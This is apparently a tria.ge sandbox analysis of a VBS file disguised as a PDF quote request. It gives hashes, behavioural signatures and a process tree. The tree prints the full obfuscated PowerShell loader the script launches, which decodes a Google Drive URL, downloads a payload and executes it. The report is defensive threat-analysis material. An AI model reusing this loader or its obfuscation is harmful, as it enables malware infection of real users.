Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
203s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/09/2024, 06:50
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs
Resource
win10v2004-20240802-en
General
-
Target
SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs
-
Size
41KB
-
MD5
7e4ddcf544043887aa681f00f4d88411
-
SHA1
cbfea2438100a9bae01a06ccc73b06d51ace1626
-
SHA256
132bb6c4728aa2754b10523a06e1d6ad4b571b59a3821c2baef81210d136d30d
-
SHA512
e0156be04e9af473941eb289304a86f03cc77ae0d1d8bb90096ded7291dc6ebb149796f7f296f10e2c38a778a9c23ea322f541b2a27e6ae9dd2f7fbf9f726bab
-
SSDEEP
384:Z9vOg3no0bPtRwN8Zb8BO7kLkpUJX4T2vz9xboQ8VfiQZykwNDG2R050v2r6Fuo3:Zp3nhaM+JzXgKQYYx9o7V
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 15 4288 powershell.exe 17 4288 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 14 drive.google.com 15 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4288 powershell.exe 4288 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4288 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1916 wrote to memory of 4288 1916 WScript.exe 82 PID 1916 wrote to memory of 4288 1916 WScript.exe 82 PID 4288 wrote to memory of 1500 4288 powershell.exe 84 PID 4288 wrote to memory of 1500 4288 powershell.exe 84
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE PRESUPUESTO 09-16-2024·pdf.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Chelydroid Congregator Dyes #>;$Ordinatvrdierne='Revyernes';<#Fngslingernes Tillb Markedsdeltagere #>;$Mlkevej=$host.PrivateData;If ($Mlkevej) {$Fortificere++;}function Brokfugle($Meteoropathologic){$Udsorteringen=$Meteoropathologic.Length-$Fortificere;for( $Grillristens=5;$Grillristens -lt $Udsorteringen;$Grillristens+=6){$Superexistent+=$Meteoropathologic[$Grillristens];}$Superexistent;}function Undergrounds($Sallies){ . ($Proportioning1) ($Sallies);}$Pretenced=Brokfugle '.avneMPos toPearlzScheeiHo ril Slv lObjeca Outc/Brack5 Toss.Dervr0suspe Retsv(GulfiWGeneriSixpenMatutdBekymo S udw El msCoif, Brum NPe anTDhole Deerf1 ueb0Stuvn.Verge0 .atr;Flles RetsfWEnroli GrnnnSynd.6Aktie4 Shri; Stut oraxKrykk6M sse4 Arse;Lokke LorenrKilervPrivi:Noni 1 Serv2 H nd1Selvc.Njals0No.pr)Dryss E.patGBarhoeCom icPala.kI.teroDi xo/Genne2 Epo 0Corbl1Matth0 omg0Hedes1No.de0Repro1 R pr KonkuFToleriMfindrb rkie Klagf Fabro,ichax avat/Jinn 1volds2 Rela1No pe. brag0Gilpy ';$Trienes=Brokfugle 'Her tuUni,ts AegaeTegnfR Stry-BjergASnabegSlan.EmisnunPlej.t Id n ';$remplacer=Brokfugle ' MicrhMu.hrtDeveltS rivpJournsTigg.:Disse/Sylph/ B ncd Sr er NoneiSuperv,iddoePh.rm.Biankg Tho,oConjuo vejsg GirdlparleeSkim,.Rib ecGummaoOphjnmOvera/.ersouAdoptc Tetr?TvineekenotxUdaanpTvangoFasttrMerrytDobb.=Man.gdJagtroPablowR.sinnTve el SandoUnderaBesrgdHatem&UnmoviPirued acet= Tilb1Mo,olEOve.aeDiskoKStign- Reta1Factoc S lspSolidhT rriCYmpefqembattFje dcEkspeeLam e8ProscxImphebAnsttQ Et bABreecE InteBAnmeluRanv XUntop0Statsh ron1 I prQLandlQSmg.rRIndicI DataTTurquqA.veneOr tl ';$Rhabdomonas=Brokfugle 'Anlbs>Lugtg ';$Proportioning1=Brokfugle 'KailyICl tteVoiciXswigs ';$Eksportaktivitetens='Slagmarkens';$Hyldeblomst226 = Brokfugle 'ManteeFortoc,kruehVanlio ulsl Tenni%respea AmpupBatukpSilkedN jeraH stit Trouarotte%Forbi\NonilmCitt i HudalPand,i.raveeAfb gupilfirKirkle gy.at kovstCubiceudjaer Ox.ln BomoeReco,.DicemK.etwaaFine.kDoors Hderl&Ldpas& Tril Unquee FrekcRustrhTerapoA mag Akad,tVagin ';Undergrounds (Brokfugle ' tr,n$ PlumgF ernlAkupuoscabrb GubeaTubinl Sidd:Jyd.pFA lenuOrnitlso ifdHaqueeK,ethnTet ndHj eme Over=Zagre(QuodlcCo tam Fored .ttr Teeto/Roma,cC rvi M ner$PapemHThresyLinjel U crdKor,eeHornebRugbrlEgefao FormmDema sHu,lrtunent2Handw2Slewe6 esen)Unr c ');Undergrounds (Brokfugle 'Terpe$OrchegHalvvl nathoFlotibturneaDell lSolen:uds,aBTransiAnchirKlvnig StoriTa estOmnist FlatiAnvennSortheI tenrVoksee ornsChest= Rust$Kissmr.andae hrysm B llp T anlAfdr,aJunk cSkrifeEnspnr Pecu. Vends SoubpHusd.lHer diNonadtDryss(Storm$Mul nR Humphcephaa Irksb,anicdisonioCollemPleuro NonpnOpst aM.riksAttri)Fugef ');Undergrounds (Brokfugle 'Muske[Uni tN eblueDumbetSebor.Hess S TrlaebamburTitulvIndbii ekscBetaseIdeenP chokoFru ti nconnVela tAr slMSamm.aOndulnFaldbaFin lg UnfaeAscenr asom]Parl :S,ept:CalcaSDimmeeduckwcDiss,u PyrorDisc iSteret SublyhousePUnderrR nneoSynketOver o.rbancH mero andelCente in r= Klan Asper[LimedNLaughe eratt Peri. P ddSpha meHjtelc CfiruSvirprb osoiBa,letbr ndyMisfaPforlarTemeroAtr.rtUndupoFrilucTaleho P.otlOdyssTProvoyD.ryap TacteVandk]Pichu:Thure:BeautT MenglQua.estaktl1P ten2Inter ');$remplacer=$Birgittineres[0];$Fedtparadoks= (Brokfugle 'Unsai$P,islgLandbl SkilOD akobCaptiaUmu,iLbesla:Repulb Do mr RestI DumrNBara k ekanETilba= ConinBl kpe Mod wMaren-HelliOForbrbCep aJTebree Remoc Ce ttRugek ProffSUntreY Fe lSHva,rtBles ejuvelmOvera.ByggenStablEAfkriTTenni.gr,llwRe tbeUnmelB ImpuCpreselAdvo iFickleFincanSl.raT');$Fedtparadoks+=$Fuldende[1];Undergrounds ($Fedtparadoks);Undergrounds (Brokfugle 'sprug$Tekstb Amp rNondii idacn DyrekKrakeeSilde.UdkigHParageDictiaOverbdCoveneStranrSemaes gley[Bolsj$UndtaTPoll,r Selvi Yenie,oncon apreHusbosNovia]Skuff=Elekt$ AutoPTavserkn,eleCellutIsarie leganA,rorcDegr ec armd Pavs ');$Unlustie=Brokfugle 'Alpha$hummeb prarCongriPargenByst kVoicee Unna. ScapDSten,o Rd gwPas onMagtflP epao osenaCau edKewpiF BettiForbilPoo retemp.(.rush$H mosrUnarbe SubcmAcacapBemaelRetlia.npoac Sl teHemitrPtero, Unan$ Bu,yMLibrauSljfelMo,tat P nti StertKon eu,astsbU.ageePosserDorm.cDeleguasseml NetvaHaematAlgocaPrg i)Blaan ';$Multituberculata=$Fuldende[0];Undergrounds (Brokfugle 'Inden$LevangvelseLDotteoPhiloBKimona puduLOlib :staalmFysi aFrankaEn.elnLiquaEDrmm.dAustasRigmnNOutmaaPhiloVSupernNon,uEAa eaNTv stEGio,d=C.tiz(AurocTStrygE HoveSredeft Matr-Broodp OutpaRg,omtUnhidhPerox Slo $Perfem IsopUMultilEn het ooniI,oborT VellUBro.tb KameER,altRBeskyc lounu Ae.olSolsoa Tendt DesmAfolkt) Morg ');while (!$Maanedsnavnene) {Undergrounds (Brokfugle 'Fo.lb$CordegUgleplHovedoTox fbSlu pabyl,elMehta:KentlOUforssbiofocGaditiWeedalSenatlDavace mi rr evike,edarr Hydr=Renc $AmatrtTankerArithuForvie Pros ') ;Undergrounds $Unlustie;Undergrounds (Brokfugle 'DiffeSD,miat .dkla hatcrBonm,tlamae-,huntSMesollMar ieTopsteQuattpRe en Teni.4 Sere ');Undergrounds (Brokfugle 'Landi$LovemgP.seklKev.noOphicbdermaa SovelG dst:pseudM LeadaCorboaCandlnBaunge B erdYderpsZwec nBe eea Ste vlowbrnAkilleCrustnS adseDusac=Hjrem(DemokTGensie,tencsCarelt Pol -TeisbP NatiaPulp tPalath Slas Pe,ma$A,itaMoverwu P.delUndert oncoiasmuntKoketuGagerbSprogeRenssr aldcImpreuZarislTi,traEkstet onia umbr) R.me ') ;Undergrounds (Brokfugle 'At ar$Br degTutenl bejdoEncrubUdradaN ckwlKuldk:IatroUUsdelrCh,leeTelefdMin,ie.rimol SyntiAlfa gKlagehFusioe ammed dmejeTapotrtrian2 iddl5Patin3Huggi=gymna$Sylv g StorlChamaoTiletbH lleaStatelGynia: Out.fTha soDamnarV racb Ha,mrSkrhauopvargLachreViderrF rbumExtiro Jourt Am li HorovBogoreSplinrAada i R tsnSog egPreheeAllonnPharmsTrans+Menne+Ward %Helot$TawdrBTi,cti PengrPla.dg ,otoiPro ot.rillt Besei Prewn Pel eSladdr Opu,eBleg,sPanto.Aftonciambko Phytu LgtenFirebt P,es ') ;$remplacer=$Birgittineres[$Uredeligheder253];}$Kildetekst=347054;$Combing=28457;Undergrounds (Brokfugle ' Udfa$A yatgKlasslSt luoAurocb RaadaReflelSmelt:BetonMMarkroBesladFahretSevrdaTabitgHi epe StifaRadionIdepolHelsigMax ls Poly Nonsp=Attra StemnG Spaae sammtho er-UdklkC UnvaoSurd.n TorfttirosePay,en ColltTeneb ort$TarteMLiomyuFremtl Kn ttArbejiLys,ntggebguFascib BlodeUnderrWhe lc K lkuAbsenl IncoaKor,htPrst aUndun ');Undergrounds (Brokfugle 'Nonas$ProavgObsidllappeobibcob Gr.baFlleslSemiv:LaengKRigesrUudtmy KkkedA,natsUmptei OkselPrte dZoproeIdiocnUskad1Advok5Cradl3Asylr Kuleg= kinn Overr[ ndelS,ntelySubpesNon atwistoeHexa mAntag.StatsC,rejloOffennMyoatvDevase Sal rp erotIsvin]Medic:Cyclo:SydafFLeukorPointoErnyam KramBSubcoaSicilsBonseeSegme6Whiff4GunvoSPreistSvi trTilraiGiftsn oyetgrante(Skden$InterMMangloSpis,d rogntTrisaasmakkg Terce B,rtaBa,innVolatlfastagAfrunsVov,l) Pi r ');Undergrounds (Brokfugle 'Cisju$Expergp loclRafl.o MisebTriplaJoloalOverb:B uesSPr hayRangemCul iaAdj nsRespekAn,teiCecidnUnpioeMiscisSepar Pewte= acti Hexob[UnderS DeciyVicersPhonotLim,aeLetf m ecov.BonmoT Op.yeKamrex Thert Emis.IsolaEPrebonInfracBaggroQuippd Ala.iUtugtnAlarmgM lds] S mm:Behan:Klok.A PreaSAne oCTill.IChambIEmanc. NvniGSnu,peCounttPyromS CrootOvercrStatuisirinn oalgFilt ( rval$BunseK MetarTungmy aculdI.dsksDaalaiFor,alJ lefd PreieStudenl.mph1Reobt5Daunt3 Boli) Tska ');Undergrounds (Brokfugle ' Slvs$Fluesg Ekahl L.ziounspab eutia En.ml B me:BebopOMortipSamkviSupersRegretEkstrhNervuoBradyc TiggoNammom Refei,ervad yppea Schnen.vem= Tilg$D sgoSStillyafstamFrdigaCh rosPractkNedruiLaanenni.ole etscsde mi.RoutosSmedeuBa pebOptagsSlyngtMi.rorReguiiUnelenIn regVskes(Hedeb$I dgaK grapiForudlSol,edCen reUninttsporeePen ukTrom sLe hetExpen,Unint$WaistC UindoReviemOwldobAden iGullanslettgDigly)Deedi ');Undergrounds $Opisthocomidae;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\milieuretterne.Kak && echo t"3⤵PID:1500
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82